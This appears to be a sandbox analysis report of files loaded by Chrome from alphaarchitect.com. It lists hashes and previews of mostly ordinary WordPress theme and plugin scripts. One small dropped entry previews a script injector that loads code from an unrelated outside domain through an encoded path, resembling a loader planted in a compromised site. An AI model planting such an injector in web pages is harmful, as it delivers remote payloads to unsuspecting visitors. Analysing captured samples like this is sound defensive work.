                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):189
                                                                                                                                                                                                                                                                        Entropy (8bit):4.525356658794344
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:TMQM+LhXEHJducXyBuZRMQM+LsLQrGztXyBuZRMQN9ctXytpffduvMQAI16IvT8I:AuhEpgsMuYLQr6MuuvM9I4IvTDMuClsT
                                                                                                                                                                                                                                                                        MD5:FB631E0265C73DDEE277C186FB1A38D9
                                                                                                                                                                                                                                                                        SHA1:364C28EF61B2C4C3264778D5B8680E9E70710261
                                                                                                                                                                                                                                                                        SHA-256:F8333C3E651FBB9A6C90182EDD058C4003328BA92DD0F3F4D2B7F0D9427AE4AB
                                                                                                                                                                                                                                                                        SHA-512:F5092D7D40AE2CD421143367A6FFAA7E9B7EC8A98C3EE3ADE7641741308A4AF4D508640CCEDC7C8510395C29D41A41162A5176B113E77C1067814EEE55C9C109
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionDisableStickyHeader(){}function fusionInitStickyHeader(){}function getStickyHeaderHeight(i){return 0}function moveSideHeaderStylingDivs(){}function fusionSideHeaderScroll(){}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3343), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3343
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354906641664406
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:aZIZuGCM6Ha+SD8+6j6PnsjfPKR0dQZz+:FuxAI++jfPG0eZa
                                                                                                                                                                                                                                                                        MD5:4E7130FECFF5C88D82919909BA4498B6
                                                                                                                                                                                                                                                                        SHA1:B0532F64107DFEF00BD7FAEB8CB62F56F64D8AF9
                                                                                                                                                                                                                                                                        SHA-256:A61FC82DA418B32E03ABD77073AD48397CD70B5669527B0938F95CE277B948A0
                                                                                                                                                                                                                                                                        SHA-512:EE1F6C352520A5CE92406DB017A237B1260189396C1AE8B47B1E8185638998B84078449350DE9CC6162C0892B77164D95E2E379D378AD36477995B14F9EB70CE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var cssua=function(e,o,i){"use strict";var s=" ua-",r=/\s*([\-\w ]+)[\s\/\:]([\d_]+\b(?:[\-\._\/]\w+)*)/,n=/([\w\-\.]+[\s\/][v]?[\d_]+\b(?:[\-\._\/]\w+)*)/g,a=/\b(?:(blackberry\w*|bb10)|(rim tablet os))(?:\/(\d+\.\d+(?:\.\w+)*))?/,b=/\bsilk-accelerated=true\b/,t=/\bfluidapp\b/,l=/(\bwindows\b|\bmacintosh\b|\blinux\b|\bunix\b)/,p=/(\bandroid\b|\bipad\b|\bipod\b|\bwindows phone\b|\bwpdesktop\b|\bxblwp7\b|\bzunewp7\b|\bwindows ce\b|\bblackberry\w*|\bbb10\b|\brim tablet os\b|\bmeego|\bwebos\b|\bpalm|\bsymbian|\bj2me\b|\bdocomo\b|\bpda\b|\bchtml\b|\bmidp\b|\bcldc\b|\w*?mobile\w*?|\w*?phone\w*?)/,c=/(\bxbox\b|\bplaystation\b|\bnintendo\s+\w+)/,d={parse:function(e,o){var i={};if(o&&(i.standalone=o),!(e=(""+e).toLowerCase()))return i;for(var s,d,m=e.split(/[()]/),w=0,_=m.length;w<_;w++)if(w%2){var u=m[w].split(";");for(s=0,d=u.length;s<d;s++)if(r.exec(u[s])){var f=RegExp.$1.split(" ").join("_"),v=RegExp.$2;(!i[f]||parseFloat(i[f])<parseFloat(v))&&(i[f]=v)}}else{var x=m[w].match(n);if(x)for(s=0
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3565), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3565
                                                                                                                                                                                                                                                                        Entropy (8bit):4.980465550334997
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:JMMQtnl7fDPcROyrQLfDJ6b5tol7fDPcROyrQLfDJ6b/jc+xjqwC3m4Ni3lNMM3t:JMMoV78JKie78JKQ1qwYQKbY
                                                                                                                                                                                                                                                                        MD5:D2EE3E17A1B873450D5279C349C0E690
                                                                                                                                                                                                                                                                        SHA1:5C4A3B1D3D0DADBE74E02523209AD5D4C98B941D
                                                                                                                                                                                                                                                                        SHA-256:D73BD8496F33CEDE958D878D2B14FA2368C8939275DA7C3F5AEA3BE6D7BC857A
                                                                                                                                                                                                                                                                        SHA-512:CA41BA42FBAA1B9ABCD86EF91952C162BACAE75A91F1B6B8E52F80F506EAC1E3A213DDAAECD32C4A9634A72610F48B408E80FC83794129377A908819F48B6C6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionReSettStickySidebarStatus(){setStickySidebarStatus(calcStickySidebarOffset())}function setStickySidebarStatus(e){!Modernizr.mq("only screen and (max-width:"+avadaSidebarsVars.sidebar_break_point+"px)")&&Math.floor(jQuery("#content").height())>=Math.floor(jQuery("#main").height())?(jQuery(".fusion-sidebar-left.fusion-sticky-sidebar .fusion-sidebar-inner-content").hasClass("fusion-sidebar-stuck")||jQuery(".fusion-sidebar-left.fusion-sticky-sidebar .fusion-sidebar-inner-content").stick_in_parent({parent:"#main > .fusion-row",sticky_class:"fusion-sidebar-stuck",bottoming:!0,spacer:!1,offset_top:e}).on("sticky_kit:stick",function(e){var s=jQuery(e.target);jQuery("body").hasClass("double-sidebars")&&(s.css("margin-left","0"),s.parent().css({"margin-left":s.data("margin"),width:s.data("width")})),s.parent().children(".fusion-panel-shortcuts-wrapper").length&&(s.parent().removeClass("fusion-panel-customizable-needs-positioned"),s.prepend(s.parent().children(".fusion-panel-shortc
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8892), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):8892
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0731984341491
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:pDvu5/2Pbq1Ztbat1oeeC9X8UnZ/HuuwJgbClRL/YeFG/uW1evaO3Ve:pTw/4QOx+R8puVY
                                                                                                                                                                                                                                                                        MD5:FB15A10A641A318F91E7E912E4F9C184
                                                                                                                                                                                                                                                                        SHA1:BD41F67233FACB96976ED7B8E7207D52C03D340E
                                                                                                                                                                                                                                                                        SHA-256:F40767552E5E94B2D5F9A65D7F640CFA7D225298023DBD682095E040809A3D1A
                                                                                                                                                                                                                                                                        SHA-512:49570D36E5B1AE3C3A4965F7D054258FF676326BEE0D9399AA990926E9A762F699DE1D09078DEBADC43B363AE51D740BA33F2E8C64BB223A73D3C62872EBB3D2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js
                                                                                                                                                                                                                                                                        Preview:!function(n,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(n="undefined"!=typeof globalThis?globalThis:n||self).LazyLoad=t()}(this,(function(){"use strict";function n(){return n=Object.assign||function(n){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var i in e)Object.prototype.hasOwnProperty.call(e,i)&&(n[i]=e[i])}return n},n.apply(this,arguments)}var t="undefined"!=typeof window,e=t&&!("onscroll"in window)||"undefined"!=typeof navigator&&/(gle|ing|ro)bot|crawl|spider/i.test(navigator.userAgent),i=t&&"IntersectionObserver"in window,o=t&&"classList"in document.createElement("p"),a=t&&window.devicePixelRatio>1,r={elements_selector:".lazy",container:e||t?document:null,threshold:300,thresholds:null,data_src:"src",data_srcset:"srcset",data_sizes:"sizes",data_bg:"bg",data_bg_hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_bg_set:"bg-set",data_poster:"poster",class_ap
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10861), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):10861
                                                                                                                                                                                                                                                                        Entropy (8bit):5.108145158379416
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:qteNnyLfwjqMPqjZUY3karXkzBKgENCVRBi+3p5hREO:esy0jq9Z5kzByCVR8+3x+O
                                                                                                                                                                                                                                                                        MD5:9665E8F5D55DFA800FDABDA1AA290AA8
                                                                                                                                                                                                                                                                        SHA1:EB41C6FD3FC7E010D2D6467F1780CB3B39861CF3
                                                                                                                                                                                                                                                                        SHA-256:215A02501DF724A9D20680B015C57585AC247BE7624F7D7DCAFA3A339F663DE9
                                                                                                                                                                                                                                                                        SHA-512:16D30155F48E2F0640CC1F309F947E491312CEDD52371D5E845C912384B409578659EDF71EF1970EA6FCAFE59DEECFA236B3688B2E1263DF2A994F63274BD857
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";var e=["sanitize","whiteList","sanitizeFn"],i=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],o={"*":["class","dir","id","lang","role",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:[],b:[],br:[],col:[],code:[],div:[],em:[],hr:[],h1:[],h2:[],h3:[],h4:[],h5:[],h6:[],i:[],img:["src","alt","title","width","height"],li:[],ol:[],p:[],pre:[],s:[],small:[],span:[],sub:[],sup:[],strong:[],u:[],ul:[]},n=/^(?:(?:https?|mailto|ftp|tel|file):|[^&:/?#]*(?:[/?#]|$))/gi,s=/^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i;function r(e,o){var r=e.nodeName.toLowerCase();if(-1!==t.inArray(r,o))return-1===t.inArray(r,i)||Boolean(e.nodeValue.match(n)||e.nodeValue.match(s));for(var a=t(o).filter(function(t,e){return e instanceof RegExp}),l=0,p=a.length;l<p;l++)if(r.match(a[l]))return!0;return!1}function a(e,i,o){if(0===e.length)return e;if(o&&"function"==type
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9731), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):9731
                                                                                                                                                                                                                                                                        Entropy (8bit):5.145708846809212
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:mW54pABXzRx0PRRWornO0dzUlwvdKYKcCV4gG75C8NSY6Q+yWrfWU/W/TGs35hmn:VFdUUdGTSIKWgW/Ta2e2q
                                                                                                                                                                                                                                                                        MD5:57D6F474F307D2454105B587E53CD518
                                                                                                                                                                                                                                                                        SHA1:2F71EECA04901F779998F7BD8C35D7EF09FEEC34
                                                                                                                                                                                                                                                                        SHA-256:2F5C6401951B4197532CF9DF977374A74BF57F91B26C1D6D2B74B94546005A79
                                                                                                                                                                                                                                                                        SHA-512:6F25D0E3788698994835F66A808B44A28031756C8D7C9924265A21688FD80517E80DAF11EE2D2617CB5D5CAF7785EF3B59BF30A0A170E3B5624BE30D6639EF97
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-conditional.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:var arr_all_conditions=[],um_field_conditions={},um_field_default_values={};function um_get_field_default_value(e){var i,n="",t=um_get_field_type(e);switch(t){case"text":case"number":case"date":case"textarea":case"select":n=e.find('input:text,input[type="number"],textarea,select').val();break;case"multiselect":n=e.find("select").val();break;case"radio":1<=e.find('input[type="radio"]:checked').length&&(n=e.find('input[type="radio"]:checked').val());break;case"checkbox":1<=e.find('input[type="checkbox"]:checked').length&&(n=1<e.find('input[type="checkbox"]:checked').length?((i=[]).push(n),e.find('input[type="checkbox"]:checked').each(function(){i.push(jQuery(this).val())}),i):e.find('input[type="checkbox"]:checked').val());break;default:n=wp.hooks.applyFilters("um_conditional_logic_default_value",n,t,e)}return{type:t,value:n}}function um_get_field_element(e){var i=e.find("input,textarea,select"),n=um_get_field_type(e);return wp.hooks.applyFilters("um_conditional_logic_field_element",i,n,
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (3259), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3260
                                                                                                                                                                                                                                                                        Entropy (8bit):5.186199563081735
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:tOLetC5CGf/6GTGgzsLNTzte4JIVAJPVXEGy3so5AQBJr55byZ/LzyQi:tOmCQO6Gzf8IeFVLyciNvmzji
                                                                                                                                                                                                                                                                        MD5:D1B47987170F121AD243ECA9674E844E
                                                                                                                                                                                                                                                                        SHA1:EFA92526560175BF68ABFEF026CCB8D07973E07D
                                                                                                                                                                                                                                                                        SHA-256:FA71793AF74B17DFE771BB2A0F495200359D8CFF358FEAA7F855CF3B17DB7B56
                                                                                                                                                                                                                                                                        SHA-512:0481DC2C776C232F55492F85EF000CFD7D2B2B55622039E79B0124A22063303227115BC9F5A1B42BAAF730E4FF4F0CE623BA47635ED1FCAADE734AC58C50A267
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets/js/ajax-forms.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function o(n,i,s){function a(e,t){if(!i[e]){if(!n[e]){var r="function"==typeof require&&require;if(!t&&r)return r(e,!0);if(c)return c(e,!0);throw(t=new Error("Cannot find module '"+e+"'")).code="MODULE_NOT_FOUND",t}r=i[e]={exports:{}},n[e][0].call(r.exports,function(t){return a(n[e][1][t]||t)},r,r.exports,o,n,i,s)}return i[e].exports}for(var c="function"==typeof require&&require,t=0;t<s.length;t++)a(s[t]);return a}({1:[function(t,e,r){"use strict";function n(t){return t.innerHTML||t.value}function i(t,e){t.innerHTML?t.innerHTML=e:t.value=e}function o(t,e){this.formEl=t,this.button=t.querySelector('input[type="submit"], button[type="submit"]'),this.char=null!=e?e:".",this.button&&(this.originalButton=this.button.cloneNode(!0))}o.prototype.start=function(){var t,e=this.button,r=this.formEl,o=this.char;e?(t=this.button.getAttribute("data-loading-text"))?i(e,t):(e.style.width=window.getComputedStyle(this.button).width,i(e,o),this.loadingInterval=window.setInterval(this.tick.bind(this),50
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10861), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):10861
                                                                                                                                                                                                                                                                        Entropy (8bit):5.108145158379416
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:qteNnyLfwjqMPqjZUY3karXkzBKgENCVRBi+3p5hREO:esy0jq9Z5kzByCVR8+3x+O
                                                                                                                                                                                                                                                                        MD5:9665E8F5D55DFA800FDABDA1AA290AA8
                                                                                                                                                                                                                                                                        SHA1:EB41C6FD3FC7E010D2D6467F1780CB3B39861CF3
                                                                                                                                                                                                                                                                        SHA-256:215A02501DF724A9D20680B015C57585AC247BE7624F7D7DCAFA3A339F663DE9
                                                                                                                                                                                                                                                                        SHA-512:16D30155F48E2F0640CC1F309F947E491312CEDD52371D5E845C912384B409578659EDF71EF1970EA6FCAFE59DEECFA236B3688B2E1263DF2A994F63274BD857
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tooltip.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";var e=["sanitize","whiteList","sanitizeFn"],i=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],o={"*":["class","dir","id","lang","role",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:[],b:[],br:[],col:[],code:[],div:[],em:[],hr:[],h1:[],h2:[],h3:[],h4:[],h5:[],h6:[],i:[],img:["src","alt","title","width","height"],li:[],ol:[],p:[],pre:[],s:[],small:[],span:[],sub:[],sup:[],strong:[],u:[],ul:[]},n=/^(?:(?:https?|mailto|ftp|tel|file):|[^&:/?#]*(?:[/?#]|$))/gi,s=/^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i;function r(e,o){var r=e.nodeName.toLowerCase();if(-1!==t.inArray(r,o))return-1===t.inArray(r,i)||Boolean(e.nodeValue.match(n)||e.nodeValue.match(s));for(var a=t(o).filter(function(t,e){return e instanceof RegExp}),l=0,p=a.length;l<p;l++)if(r.match(a[l]))return!0;return!1}function a(e,i,o){if(0===e.length)return e;if(o&&"function"==type
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12237), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):12237
                                                                                                                                                                                                                                                                        Entropy (8bit):5.087270262809788
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:YurHs4Fofilv3xv37N1Es0Yxz+LogQYRX+S6ETG92fC76lmTs3VYiSaWuzb:YMHcilv3xv37DEs0YxKLogQY0BE8GlmO
                                                                                                                                                                                                                                                                        MD5:F96558B2811C780C7207690899F95888
                                                                                                                                                                                                                                                                        SHA1:58D134AEB83C42997CBDE0C9913AB4533B5A2F00
                                                                                                                                                                                                                                                                        SHA-256:2707F811EA435C06BB13CC82DACE245CAC05C24BA64DBDD48FCD42338F23BD9F
                                                                                                                                                                                                                                                                        SHA-512:EDCDBD795E612EE5F4F3F34258E668794F203D594B7BB98664B6EE37AADA790928B84C6AF795D9AE6A22D9FA86346BB9DE45D311C04FC512D2360C2EF0B509AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:function um_sanitize_value(e,t){var a=document.createElement("div"),e=(a.innerText=e,a.innerHTML);return t&&jQuery(t).val(e),e}function um_unsanitize_value(e){var t=document.createElement("textarea");return t.innerHTML=e,0===t.childNodes.length?"":t.childNodes[0].nodeValue}jQuery(document).ready(function(){function n(e){var a=jQuery(e.currentTarget),e=a.find(":selected");1<e.length&&e.each(function(e,t){""===t.value&&(t.selected=!1,a.trigger("change"))})}jQuery(document.body).on("click",".um-dropdown a.real_url",function(){window.location=jQuery(this).attr("href")}),jQuery(document.body).on("click",".um-trigger-menu-on-click",function(){var e=jQuery(this).find(".um-dropdown");return UM.dropdown.show(e),!1}),jQuery(document.body).on("click",".um-dropdown-hide",function(){return UM.dropdown.hideAll(),!1}),jQuery(document.body).on("click","a.um-manual-trigger",function(){var e=jQuery(this).attr("data-child"),t=jQuery(this).attr("data-parent");return jQuery(this).parents(t).find(e).trigger
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):229
                                                                                                                                                                                                                                                                        Entropy (8bit):5.320442008813383
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:2LGT9gO9lfTRWF8tK8+Jdt2RvVTPT46Vau:2STfTRWF8tK8EUVPvVau
                                                                                                                                                                                                                                                                        MD5:B1A549F8FE1C06CE5547AF3ECCAD1325
                                                                                                                                                                                                                                                                        SHA1:1392799DFA05D5C2692CFA4F26DC8BC2655A1761
                                                                                                                                                                                                                                                                        SHA-256:A799D6B5511D28C7963B5F8AA546B31A8A874C01CCA7816D4E0B3888E7492DD3
                                                                                                                                                                                                                                                                        SHA-512:DE89604987CBC79FD6AC8DCAD904EF77169084CCC9832CE98D7E41F82383B4BD8F19CE5F93E4AF86458E76AF02738394BAA789CA3435C6E5AD219AA0DA505DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(function(l,h,n,g,o){g=l.createElement(h);o=l.getElementsByTagName(h)[0];g.async=1;g.src=n;o.parentNode.insertBefore(g,o)})(document,'script','https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==')
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):384
                                                                                                                                                                                                                                                                        Entropy (8bit):4.773821070760564
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:zvt9teGX4XA50XiP50oP0yvtly2XDFTQJO7GBJjIaU0XiP50HugVOflfi0Vufkg8:zvpeGX4BW550yvfXhB7GBJvW5kulwIHp
                                                                                                                                                                                                                                                                        MD5:94EBDD5A8AF40D8E0612C70A0725F7D8
                                                                                                                                                                                                                                                                        SHA1:C437BFE00812D31B61F93E75BC8B0ED9CD15BA65
                                                                                                                                                                                                                                                                        SHA-256:E101E32BA6CD535F0C03A4FA80754DFA694B187C713C35BCC72E83438F3D4EE3
                                                                                                                                                                                                                                                                        SHA-512:0DC340A4430D6931F8A555EA11331C7A362CD6E26D7C9A16D27EC48BBDB256952E923684B4D9EB391D6E433551B0186D282B4200AB355265712A722A042229DE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(window).on("load",function(){um_responsive(),um_modal_responsive()}),jQuery(window).on("resize",_.debounce(function(){responsive_Modal(),wp.hooks.doAction("um_window_resize"),um_responsive(),um_modal_responsive()},300)),wp.hooks.addAction("um_admin_modal_success_result","um_frontend_responsive",function(o){o.find(".um-admin-modal-body").find(".um").length&&um_responsive()});
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13604), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):13604
                                                                                                                                                                                                                                                                        Entropy (8bit):5.148333221541441
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ri2gYV6qJ+Cq9N9N8qHNN/wNOVpGjcOiQ:u2gYJIVpGYOiQ
                                                                                                                                                                                                                                                                        MD5:C8E5CF5BB2B1762A2B2EEE0CCB58FAA0
                                                                                                                                                                                                                                                                        SHA1:789C3F9489D55A90E1819CC9B18CBC23035E48F0
                                                                                                                                                                                                                                                                        SHA-256:A67995BBD0B18BD66EF29DBFB5C82E055F74205ED150CB6A088326E6DFC0FCA2
                                                                                                                                                                                                                                                                        SHA-512:5E6D6BDBCA48B041CDA7BD14E2A5B3C3BB4BC810E3541DA8EAE4ABF9800976078E1EBB934E53AC7E6CBD8818E89B644B57E46D51C560836D6B1AD80D71481285
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function _fusionRefreshScroll(){window._fusionScrollTop=window.pageYOffset,window._fusionScrollLeft=window.pageXOffset}function _fusionParallaxAll(){var t;for(_fusionRefreshScroll(),t=0;t<window._fusionImageParallaxImages.length;t++)window._fusionImageParallaxImages[t].doParallax()}function _fusionRefreshWindow(){window._fusionScrollTop=window.pageYOffset,window._fusionWindowHeight=jQuery(window).height(),window._fusionScrollLeft=window.pageXOffset,window._fusionWindowWidth=jQuery(window).width()}!function(t){var i;i=0,t.requestAnimationFrame||(t.webkitRequestAnimationFrame&&(t.requestAnimationFrame=t.webkitRequestAnimationFrame,t.cancelAnimationFrame=t.webkitCancelAnimationFrame||t.webkitCancelRequestAnimationFrame),t.requestAnimationFrame=function(e){var s=(new Date).getTime(),a=Math.max(0,16-(s-i)),n=t.setTimeout(function(){e(s+a)},a);return i=s+a,n},t.cancelAnimationFrame=function(t){clearTimeout(t)}),"function"==typeof define&&define(function(){return t.requestAnimationFrame})}(wi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-DJ0HWC0D2K&gacid=1149377197.1734698707&gtm=45je4cc1v888867815za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=710385115
                                                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6568), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6568
                                                                                                                                                                                                                                                                        Entropy (8bit):5.227719091468512
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:3IrL3+ya3vBrPh/9Ckh/F0Ruk0rKG4shSuvMTEkmcXe+ax:OL3+ya35rPh/9Ck1FWuk0rj4shSEMTE9
                                                                                                                                                                                                                                                                        MD5:C5193F398E9B432ECBBE52811B752069
                                                                                                                                                                                                                                                                        SHA1:B220BF0962732E435ECB9416EBDD68F3B3A6127C
                                                                                                                                                                                                                                                                        SHA-256:FF0818862D629F2F5BBDA6B6E609874483B0A39EC5CECD17A9E7EE00C2DF4489
                                                                                                                                                                                                                                                                        SHA-512:9D63016DF40B86D64A127DB95CD635CC60538444281E2014EB0C00EE37E0A4A9445ACDFB032E1229E3CA0B2E4980F7D71FA816A0AD43BFEAB2D54E7F6E51757B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=1733842125
